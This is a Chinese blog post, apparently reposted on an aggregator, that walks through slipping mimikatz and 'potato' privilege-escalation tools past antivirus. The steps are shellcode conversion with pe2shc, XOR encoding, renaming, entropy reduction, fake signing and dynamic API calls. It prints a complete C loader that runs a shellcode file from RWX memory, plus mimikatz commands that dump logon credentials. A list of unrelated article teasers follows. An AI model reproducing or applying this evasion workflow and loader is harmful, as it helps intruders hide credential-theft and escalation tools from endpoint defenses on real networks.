内网exp对抗

内网工具对抗

首先,你需要分析:

1、安全工具是否有源代码

2、安全工具源代码逻辑复杂程度

3、当前源代码你是否有能力修改

其次,你需要考虑:

1、无源码或无能力修改

2、各种异常bug打包问题

3、修改打包后效果也不太好

故:

1、非源码修改方式:

转换SC利用同C2的加载上线模式进行对抗(难度小速度快但效果不一)

2、源码修改方式:

魔改源码打乱特征的方法重新定义工具项目(难度大但修改好后效果稳)

操作方法,其实大概流程和免杀shellcode差不多,都是一个思路

1、将exe转shellcode2、找分离加载器代码3、分离基础上加混淆4、自签名详细信息熵

mimkatz

下载猕猴桃(下边猕猴桃都是指mimkatz)

下载exe以及源代码

源码修改方式

加载源代码,这里就不改了,sdk不知道为什么加载不出来

image-20240327144144302

非源码修改方式

将猕猴桃改为.bin文件

pe2shc.exe mimikatz.exe mimikatz.bin

image-20240327144910239

使用runshc64.exe是可以正常运行的,但是这个mimikatz.bin还是被杀。这里可以采用和之前一样的shellcode载入进行使用。

runshc64.exe mimikatz.bin

image-20240327145011433

将mimikatz.bin进行异或0x55,进行保存

image-20240327145914118

新建mimikatz项目,将项目之前的清单那些关闭。

代码重新生成

将之前的mimikatz.bin重命名为猕猴桃.bin,生成的exeu也换成猕猴桃.exe,经过测试mimikatz这个名字会直接报毒。

换好后直接测试。

image-20240327150738928

放到360报qvm202,换东西即可,之前提到过。

减少熵值

image-20240327151522452

增加图标签名

image-20240327152118250

代码做了动态api修改

image-20240327162718535

#获取权限
privilege::debug#抓取密码
sekurlsa::logonpasswords

在执行sekurlsa::logonpasswords是有可能被360抓取到的,这个就涉及到源码修改绕过。

提权脚本

常规土豆家族提权exe对于杀毒直接就是查杀的状态,这里和上边的一样的操作即可。(有部分无法使用)

pe2shc.exe F:\shellcodeTest\工具免杀\土豆系列EXE\CandyPotato.exe CandyPotato.bin

image-20240327221103923

这里不用异或,直接做一个加载器上线即可。

image-20240327221854533

360报qvm202按照上面的解决方法即可

但是换一个思路,加载器加载.bin文件直接执行,不写一个文件,用户自定义上传。

#include <windows.h>
#include <stdint.h>
#include <cstdio>typedef BOOL(WINAPI* pVirtualProtect)(LPVOID lpAddress,SIZE_T dwSize,DWORD  flNewProtect,PDWORD lpflOldProtect);
pVirtualProtect VProtect = (pVirtualProtect)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "VirtualProtect");typedef LPVOID(WINAPI* pVirtualAlloc)(LPVOID lpAddress,SIZE_T dwSize,DWORD  flAllocationType,DWORD  flProtect);
pVirtualAlloc VAlloc = (pVirtualAlloc)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "VirtualAlloc");unsigned char* inputFile(const char* filename, int& len) {FILE* fp = NULL;int err = fopen_s(&fp, filename, "rb");if (err != 0 || !fp) {exit(-1);}fseek(fp, 0, SEEK_END);len = ftell(fp);rewind(fp);unsigned char* lpAddress = (unsigned char*)malloc(len);fread(lpAddress, 1, len, fp);fclose(fp);return lpAddress;
}int main(int argc, char* argv[])
{if (argc < 2) {printf("Usage: %s <filename>\n", argv[0]);return -1;}const char* filename = argv[1];void* runtime;BOOL    retval;DWORD   old_protect = 0;unsigned char* payload;int payload_len;payload = inputFile(filename, payload_len);runtime = VAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);RtlMoveMemory(runtime, payload, payload_len);retval = VProtect(runtime, payload_len, PAGE_EXECUTE_READWRITE, &old_protect);if (retval != 0){int (*func)();func = (int (*)())runtime;func();}VirtualFree(runtime, payload_len, MEM_RELEASE);return 0;
}

image-20240327223428185

pe2shc.exe JuicyPotatoNG.exe JuicyPotatoNG.bin

image-20240327223554769

image-20240327223642306

失败的

image-20240327223742614

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/774984.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Linux】详解进程终止进程等待

【Linux】详解进程终止进程等待

一、页表&&写时拷贝的进一步理解 页表中不仅仅只有虚拟地址到物理地址的映射&#xff0c;还包括了很多选项&#xff0c;其中就包括了映射条目的权限。当我们进程的代码和数据加载到内存并和进程地址空间建立映射关系时&#xff0c;如果数据的内容不允许被修改&#xff…
阅读更多...
PTA------ 敲笨钟

PTA------ 敲笨钟

字符串处理问题&#xff01;------->字符串处理相关操做 代码&#xff1a; #include <iostream> #include<algorithm> #include<cmath> #include<cstring> #include<set> #include<stack> #include<queue> #include<map>…
阅读更多...
【Java.mysql】——数据删改(DU) 附加数据库约束

【Java.mysql】——数据删改(DU) 附加数据库约束

目录 &#x1f6a9;更新(Update) &#x1f6a9;删除&#xff08;Delete&#xff09; &#x1f6a9;数据库约束 &#x1f388;约束类型 ✅NULL约束 ✅NNIQUE 唯一约束 ✅DEFAULT&#xff1a;默认值约束 ✅PRIMARY KEY&#xff1a;主键约束 ✅FOREIGN KEY&#xff1a;外键…
阅读更多...
什么是字典序?字典序详解

什么是字典序?字典序详解

字典序&#xff0c;也称为词典序、字典顺序、字母序或词序&#xff0c;是指在排序时&#xff0c;按照字母顺序或数字顺序等自然顺序进行排序的方法。通常&#xff0c;字典序应用于字符串排序&#xff0c;但也适用于其他类型的数据结构。 对于字符串来说&#xff0c;字典序的排…
阅读更多...
探究 Switch Case 和 While 循环:两种强大的控制结构

探究 Switch Case 和 While 循环:两种强大的控制结构

在计算机编程中&#xff0c;控制结构是指用于控制程序执行流程的特殊语句或语法。这些结构使程序能够根据不同的条件执行不同的操作&#xff0c;从而增强了程序的灵活性和功能性。本文将介绍两种常见的控制结构&#xff1a;Switch Case 和 While 循环&#xff0c;并通过示例代码…
阅读更多...
【前端】Layui的表格常用功能,表单提交事件,表格下拉按钮点击事件,表格外的按钮点击事件

【前端】Layui的表格常用功能,表单提交事件,表格下拉按钮点击事件,表格外的按钮点击事件

欢迎来到《小5讲堂》 大家好&#xff0c;我是全栈小5。 这是《前端》系列文章&#xff0c;每篇文章将以博主理解的角度展开讲解&#xff0c; 特别是针对知识点的概念进行叙说&#xff0c;大部分文章将会对这些概念进行实际例子验证&#xff0c;以此达到加深对知识点的理解和掌握…
阅读更多...
使用vue-quill-editor实现图片截图复制粘贴上传

使用vue-quill-editor实现图片截图复制粘贴上传

需求 运营需要用多张图片进行OCR识别&#xff0c;图片来源一般是运营的截图&#xff0c;直接粘贴过来&#xff0c;然后需求请求OCR截图提交图片list&#xff0c;粘贴图片的同时需要上传图片到cdn地址&#xff1b; 分析 一个输入框&#xff08;富文本框&#xff09;&#xff…
阅读更多...
高阶SQL语句(二)

高阶SQL语句(二)

一 子查询 也被称作内查询或者嵌套查询&#xff0c;是指在一个查询语句里面还嵌套着另一个查询语 句。子查询语句 是先于主查询语句被执行的&#xff0c;其结果作为外层的条件返回给主查询进行下一 步的查询过滤。 ①子语句可以与主语句所查询的表相同&#xff0c;也可以是不…
阅读更多...
STM32收发HEX数据包

STM32收发HEX数据包

在实际应用中&#xff0c;STM32的串口通信都是以数据包格式进行收发&#xff0c;这个数据包一般都包含包头和包尾&#xff0c;表示一个数据包。源代码在文末给出 数据包格式&#xff1a; 固定长度&#xff0c;含包头包尾 可变包长&#xff0c;含包头包尾 问题1&#xff1a;当…
阅读更多...
YoloV5改进策略:BackBone改进|ECA-Net:用于深度卷积神经网络的高效通道注意力

YoloV5改进策略:BackBone改进|ECA-Net:用于深度卷积神经网络的高效通道注意力

摘要 本文使用ECA-Net注意力机制加入到YoloV5中。我尝试了多种改进方法&#xff0c;并附上改进结果&#xff0c;方便大家了解改进后的效果&#xff0c;为论文改进提供思路。&#xff08;更新中。。。。&#xff09; 论文&#xff1a;《ECA-Net&#xff1a;用于深度卷积神经网…
阅读更多...
183. 从不订购的客户

183. 从不订购的客户

文章目录 题意思路代码 题意 题目链接 查找未出现在orders表里面的内容 思路 子查询not in 代码 select name as Customers from Customers where id not in (select customerId from Orders group by customerId)
阅读更多...
86.分隔链表

86.分隔链表

给你一个链表的头节点 head 和一个特定值 x &#xff0c;请你对链表进行分隔&#xff0c;使得所有 小于 x 的节点都出现在 大于或等于 x 的节点之前。 你应当 保留 两个分区中每个节点的初始相对位置。 示例 1&#xff1a; ​ 输入&#xff1a;head [1,4,3,2,5,2], x 3 输出&…
阅读更多...
前端学习之JavaScript有关字符串的一些方法

前端学习之JavaScript有关字符串的一些方法

&#xff08;注释是对各个方法的一些解释&#xff09; <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><title>字符串</title> </head> <body><script>let str1 test1let str2 n…
阅读更多...
前端性能优化:掌握解决方案

前端性能优化:掌握解决方案

课程介绍 我们常说性能永远是第一需求&#xff0c;作为一个前端工程师&#xff0c;不管使用什么框架&#xff0c;不管从事什么类型的网站或应用开发&#xff0c;只要是项目被用户使用&#xff0c;性能优化就永远是你需要关注的问题。通常情况下&#xff0c;工程师们在深入了解…
阅读更多...
[C++打怪升级]--学习总目录

[C++打怪升级]--学习总目录

总结C打怪升级学习目录&#xff0c;便于翻阅&#xff0c;制作不易&#xff0c;点个赞吧&#xff0c;感谢&#xff01; 基础入门 ​​​​​​[C基础入门]&#xff08;一&#xff09;&#xff1a;初识 [C基础入门]&#xff08;二&#xff09;&#xff1a;数据类型 [C基础入门…
阅读更多...
esp32c6 micropython固件首发

esp32c6 micropython固件首发

挺久没写正经文章了&#xff0c;主要是micropython确实也没那么多可挖掘的东西&#xff0c;这次带来的是micropython esp32c6 抢先版的固件&#xff0c;是df论坛的一位大佬编译的&#xff0c;属于测试阶段 固件下载地址 我30岁开始学编程&#xff0c;现在33了&#xff0c;终于程…
阅读更多...
白板手推公式性质 AR模型 时间序列分析

白板手推公式性质 AR模型 时间序列分析

白板手推公式性质 AR模型 时间序列分析 视频讲解&#xff1a;https://www.bilibili.com/video/BV1D1421S76v/?spm_id_from.dynamic.content.click&vd_source6e452cd7908a2d9b382932f345476fd1 B站对应视频讲解(白板手推公式性质 AR模型 时间序列分析)
阅读更多...
[C语言]带连接数统计功能的多进程TCP服务器

[C语言]带连接数统计功能的多进程TCP服务器

编程思想: so,我们一分钱没花改造了一个简易TCP服务器,具体的: 1 当accept正常返回后,创建一个子进程用于处理数据 2 在子进程中 关闭socket返回的fd,在父进程中关闭accept返回的fd,防止资源泄露及不可预知的风险 3 父进程中忽略子进程结束信号,等于自动回收,防止变僵尸 当…
阅读更多...
hdlbits系列verilog解答(Hadd)-65

hdlbits系列verilog解答(Hadd)-65

文章目录 一、问题描述二、verilog源码三、仿真结果一、问题描述 本节我们创建一个半加法器。半加法器将两个位相加(无进位)并产生求和和进出。 模块声明 module top_module( input a, b, output cout, sum ); 思路: 可用真值表写出逻辑表达式,或者直接用数据流方式。 二…
阅读更多...
Qt 压缩/解压文件

Qt 压缩/解压文件

前面讲了很多Qt的文件操作&#xff0c;文件操作自然就包括压缩与解压缩文件了&#xff0c;正好最近项目里要用到压缩以及解压缩文件&#xff0c;所以就研究了一下Qt如何压缩与解压缩文件。 QZipReader/QZipWriter QZipReader 和 QZipWriter 类提供了用于读取和写入 ZIP 格式文…
阅读更多...
最新文章

Copyright @ 2022~2023